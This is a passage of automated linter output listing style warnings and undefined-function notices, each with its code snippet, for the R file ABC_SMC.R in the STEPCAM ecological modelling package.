^~~~~~~~\n```\n[R/ABC_SMC.R:159:73:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L159) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getFromPrevious(indices, weights, dispVals, filtVals, compVals)\n                                                                        ^~~~~~~~\n```\n[R/ABC_SMC.R:160:19:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L160) *warning:* **no visible global function definition for ‘perturb’**\n```r\n​        params <- perturb(params, sigma)\n                  ^~~~~~~\n```\n[R/ABC_SMC.R:167:11:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L167) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​        if( sum(params) > species_fallout) {\n          ^\n```\n[R/ABC_SMC.R:179:1:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L179) *style:* **lines should not be more than 80 characters.**\n```r\n​      # and community ((66 * permutations * communities) x total species richness) matrices\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:180:1:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L180) *style:* **lines should not be more than 80 characters.**\n```r\n​      traits <- as.data.frame(species[, c(2:(n_traits + 1))], row.names = c(1:taxa))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:184:1:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L184) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  d <- read.table(paste(\"particles_t=\", t - 2, \".txt\", sep=\"\",\n^\n```\n[R/ABC_SMC.R:185:1:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L185) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                        collapse = NULL), header = F)\n^\n```\n[R/ABC_SMC.R:186:1:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L186) *style:* **lines should not be more than 80 characters.**\n```r\n​     # FD_output <- dbFD(traits[present_species, ], communities[, present_species], stand.x = F,messages=FALSE)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:186:8:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L186) *style:* **Commented code should be removed.**\n```r\n​     # FD_output <- dbFD(traits[present_species, ], communities[, present_species], stand.x = F,messages=FALSE)\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:187:20:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L187) *style:* **Variable and function names should be all lowercase.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities[,present_species])\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:187:20:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L187) *warning:* **no visible global function definition for ‘strippedDbFd’**\n```r\n​      FD_output <- strippedDbFd(Ord, communities[,present_species])\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:187:51:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L187) *style:* **Commas should always have a space after.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities[,present_species])\n                                                  ^\n```\n[R/ABC_SMC.R:188:1:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L188) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  d <- read.table(paste(\"particles_t=\", t - 1, \".txt\", sep=\"\",\n^~\n```\n[R/ABC_SMC.R:188:1:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L188) *style:* **lines should not be more than 80 characters.**\n```r\n​      FRic <- FD_output$FRic # FRic = functional richness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:189:1:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L189) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t                        collapse = NULL), header = F)\n^~\n```\n[R/ABC_SMC.R:189:1:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L189) *style:* **lines should not be more than 80 characters.**\n```r\n​      FEve <- FD_output$FEve # FEve = functional evenness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:190:1:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L190) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  } else {\n^\n```\n[R/ABC_SMC.R:190:1:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L190) *style:* **lines should not be more than 80 characters.**\n```r\n​      FDiv <- FD_output$FDiv # FDiv = functional diversity (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:191:1:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L191) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  d <- read.table(paste(\"particles_t=\", t, \".txt\", sep=\"\",\n^~\n```\n[R/ABC_SMC.R:192:1:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L192) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t                        collapse = NULL), header = F)\n^~\n```\n[R/ABC_SMC.R:193:1:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L193) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  }\n^\n```\n[R/ABC_SMC.R:199:1:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L199) *style:* **lines should not be more than 80 characters.**\n```r\n​      # calculate distance of trait mean simulated community from that of observed\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:202:1:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L202) *style:* **lines should not be more than 80 characters.**\n```r\n​      # (inverse) fit of model: euclidian distance of FD and trait mean values of\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:204:1:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L204) *style:* **lines should not be more than 80 characters.**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]], mean_optimum[1], summary_stats, sd_vals)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:204:14:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L204) *style:* **Variable and function names should be all lowercase.**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]], mean_optimum[1], summary_stats, sd_vals)\n             ^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:204:14:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L204) *warning:* **no visible global function definition for ‘calculateDistance’**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]], mean_optimum[1], summary_stats, sd_vals)\n             ^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:208:9:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L208) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:208:27:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L208) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n                          ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:209:9:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L209) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextDisp[numberAccepted] = params[1]\n        ^~~~~~~~\n```\n[R/ABC_SMC.R:209:18:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L209) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextDisp[numberAccepted] = params[1]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:209:34:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L209) *style:* **Use <-, not =, for assignment.**\n```r\n​        nextDisp[numberAccepted] = params[1]\n                                 ^\n```\n[R/ABC_SMC.R:210:9:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L210) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextFilt[numberAccepted] = params[2]\n        ^~~~~~~~\n```\n[R/ABC_SMC.R:210:18:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L210) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextFilt[numberAccepted] = params[2]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:210:34:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L210) *style:* **Use <-, not =, for assignment.**\n```r\n​        nextFilt[numberAccepted] = params[2]\n                                 ^\n```\n[R/ABC_SMC.R:211:9:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L211) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextComp[numberAccepted] = params[3]\n        ^~~~~~~~\n```\n[R/ABC_SMC.R:211:18:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L211) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextComp[numberAccepted] = params[3]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:211:34:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L211) *style:* **Use <-, not =, for assignment.**\n```r\n​        nextComp[numberAccepted] = params[3]\n                                 ^\n```\n[R/ABC_SMC.R:213:14:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L213) *style:* **Variable and function names should be all lowercase.**\n```r\n​        fits[numberAccepted] = fit\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:213:30:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L213) *style:* **Use <-, not =, for assignment.**\n```r\n​        fits[numberAccepted] = fit\n                             ^\n```\n[R/ABC_SMC.R:214:9:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L214) *style:* **Variable and function names should be all lowercase.**\n```r\n​        RichVec[numberAccepted] = FRic[[1]]\n        ^~~~~~~\n```\n[R/ABC_SMC.R:214:17:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L214) *style:* **Variable and function names should be all lowercase.**\n```r\n​        RichVec[numberAccepted] = FRic[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:214:33:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L214) *style:* **Use <-, not =, for assignment.**\n```r\n​        RichVec[numberAccepted] = FRic[[1]]\n                                ^\n```\n[R/ABC_SMC.R:215:9:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​        EveVec[numberAccepted] = FEve[[1]]\n        ^~~~~~\n```\n[R/ABC_SMC.R:215:16:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​        EveVec[numberAccepted] = FEve[[1]]\n               ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:215:32:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L215) *style:* **Use <-, not =, for assignment.**\n```r\n​        EveVec[numberAccepted] = FEve[[1]]\n                               ^\n```\n[R/ABC_SMC.R:216:9:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L216) *style:* **Variable and function names should be all lowercase.**\n```r\n​        DivVec[numberAccepted] = FDiv[[1]]\n        ^~~~~~\n```\n[R/ABC_SMC.R:216:16:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L216) *style:* **Variable and function names should be all lowercase.**\n```r\n​        DivVec[numberAccepted] = FDiv[[1]]\n               ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:216:32:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L216) *style:* **Use <-, not =, for assignment.**\n```r\n​        DivVec[numberAccepted] = FDiv[[1]]\n                               ^\n```\n[R/ABC_SMC.R:217:9:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L217) *style:* **Variable and function names should be all lowercase.**\n```r\n​        OptVec[numberAccepted] = mean_optimum;\n        ^~~~~~\n```\n[R/ABC_SMC.R:217:16:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L217) *style:* **Variable and function names should be all lowercase.**\n```r\n​        OptVec[numberAccepted] = mean_optimum;\n               ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:217:32:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L217) *style:* **Use <-, not =, for assignment.**\n```r\n​        OptVec[numberAccepted] = mean_optimum;\n                               ^\n```\n[R/ABC_SMC.R:219:11:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L219) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​        if(t == 1) {\n          ^\n```\n[R/ABC_SMC.R:220:11:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L220) *style:* **Variable and function names should be all lowercase.**\n```r\n​          nextWeights[numberAccepted] = 1\n          ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:220:23:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L220) *style:* **Variable and function names should be all lowercase.**\n```r\n​          nextWeights[numberAccepted] = 1\n                      ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:220:39:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L220) *style:* **Use <-, not =, for assignment.**\n```r\n​          nextWeights[numberAccepted] = 1\n                                      ^\n```\n[R/ABC_SMC.R:222:11:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L222) *style:* **Variable and function names should be all lowercase.**\n```r\n​          nextWeights[numberAccepted] =\n          ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:222:23:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L222) *style:* **Variable and function names should be all lowercase.**\n```r\n​          nextWeights[numberAccepted] =\n                      ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:222:39:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L222) *style:* **Use <-, not =, for assignment.**\n```r\n​          nextWeights[numberAccepted] =\n                                      ^\n```\n[R/ABC_SMC.R:223:13:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L223) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, dispVals, filtVals,\n            ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:223:53:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L223) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, dispVals, filtVals,\n                                                    ^~~~~~~~\n```\n[R/ABC_SMC.R:223:63:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L223) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, dispVals, filtVals,\n                                                              ^~~~~~~~\n```\n[R/ABC_SMC.R:224:29:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L224) *style:* **Variable and function names should be all lowercase.**\n```r\n​                            compVals, numParticles, weights)\n                            ^~~~~~~~\n```\n[R/ABC_SMC.R:224:39:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L224) *style:* **Variable and function names should be all lowercase.**\n```r\n​                            compVals, numParticles, weights)\n                                      ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:227:18:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L227) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t      if ((numberAccepted)%%(numParticles / PRINT_FREQ) == 0) {\n                 ^\n```\n[R/ABC_SMC.R:227:19:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L227) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t      if ((numberAccepted)%%(numParticles / PRINT_FREQ) == 0) {\n                  ^\n```\n[R/ABC_SMC.R:227:20:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L227) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t      if ((numberAccepted)%%(numParticles / PRINT_FREQ) == 0) {\n                   ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:227:35:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L227) *style:* **Put spaces around all infix operators.**\n```r\n​\t      if ((numberAccepted)%%(numParticles / PRINT_FREQ) == 0) {\n                                 ~^~~\n```\n[R/ABC_SMC.R:227:37:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L227) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t      if ((numberAccepted)%%(numParticles / PRINT_FREQ) == 0) {\n                                    ^\n```\n[R/ABC_SMC.R:227:38:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L227) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t      if ((numberAccepted)%%(numParticles / PRINT_FREQ) == 0) {\n                                     ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:227:51:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L227) *style:* **Put spaces around all infix operators.**\n```r\n​\t      if ((numberAccepted)%%(numParticles / PRINT_FREQ) == 0) {\n                                                 ~^~\n```\n[R/ABC_SMC.R:227:65:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L227) *style:* **Put spaces around all infix operators.**\n```r\n​\t      if ((numberAccepted)%%(numParticles / PRINT_FREQ) == 0) {\n                                                               ~^~~\n```\n[R/ABC_SMC.R:233:21:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L233) *style:* **Put spaces around all infix operators.**\n```r\n​      if (tried > (1/stopRate) && tried > 5)  {\n                   ~^~\n```\n[R/ABC_SMC.R:233:22:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L233) *style:* **Variable and function names should be all lowercase.**\n```r\n​      if (tried > (1/stopRate) && tried > 5)  {\n                     ^~~~~~~~\n```\n[R/ABC_SMC.R:235:13:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L235) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n            ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:235:38:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L235) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n                                     ^~~~~~~~\n```\n[R/ABC_SMC.R:242:5:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L242) *style:* **Variable and function names should be all lowercase.**\n```r\n​    dispVals <- nextDisp\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:242:17:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L242) *style:* **Variable and function names should be all lowercase.**\n```r\n​    dispVals <- nextDisp\n                ^~~~~~~~\n```\n[R/ABC_SMC.R:243:5:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L243) *style:* **Variable and function names should be all lowercase.**\n```r\n​    filtVals <- nextFilt\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:243:17:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L243) *style:* **Variable and function names should be all lowercase.**\n```r\n​    filtVals <- nextFilt\n                ^~~~~~~~\n```\n[R/ABC_SMC.R:244:5:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L244) *style:* **Variable and function names should be all lowercase.**\n```r\n​    compVals <- nextComp\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:244:17:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L244) *style:* **Variable and function names should be all lowercase.**\n```r\n​    compVals <- nextComp\n                ^~~~~~~~\n```\n[R/ABC_SMC.R:245:16:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L245) *style:* **Variable and function names should be all lowercase.**\n```r\n​    weights <- nextWeights\n               ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:247:21:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L247) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec,\n                    ^~~~~~~~\n```\n[R/ABC_SMC.R:247:31:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L247) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec,\n                              ^~~~~~~~\n```\n[R/ABC_SMC.R:247:41:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L247) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec,\n                                        ^~~~~~~~\n```\n[R/ABC_SMC.R:247:51:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L247) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec,\n                                                  ^~~~~~~\n```\n[R/ABC_SMC.R:248:21:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L248) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    EveVec, DivVec, OptVec, fits, weights)\n                    ^~~~~~\n```\n[R/ABC_SMC.R:248:29:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L248) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    EveVec, DivVec, OptVec, fits, weights)\n                            ^~~~~~\n```\n[R/ABC_SMC.R:248:37:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L248) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    EveVec, DivVec, OptVec, fits, weights)\n                                    ^~~~~~\n```\n[R/ABC_SMC.R:249:54:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L249) *style:* **Put spaces around all infix operators.**\n```r\n​    file_name <- paste(\"particles_t=\", t, \".txt\", sep=\"\", collapse = NULL)\n                                                    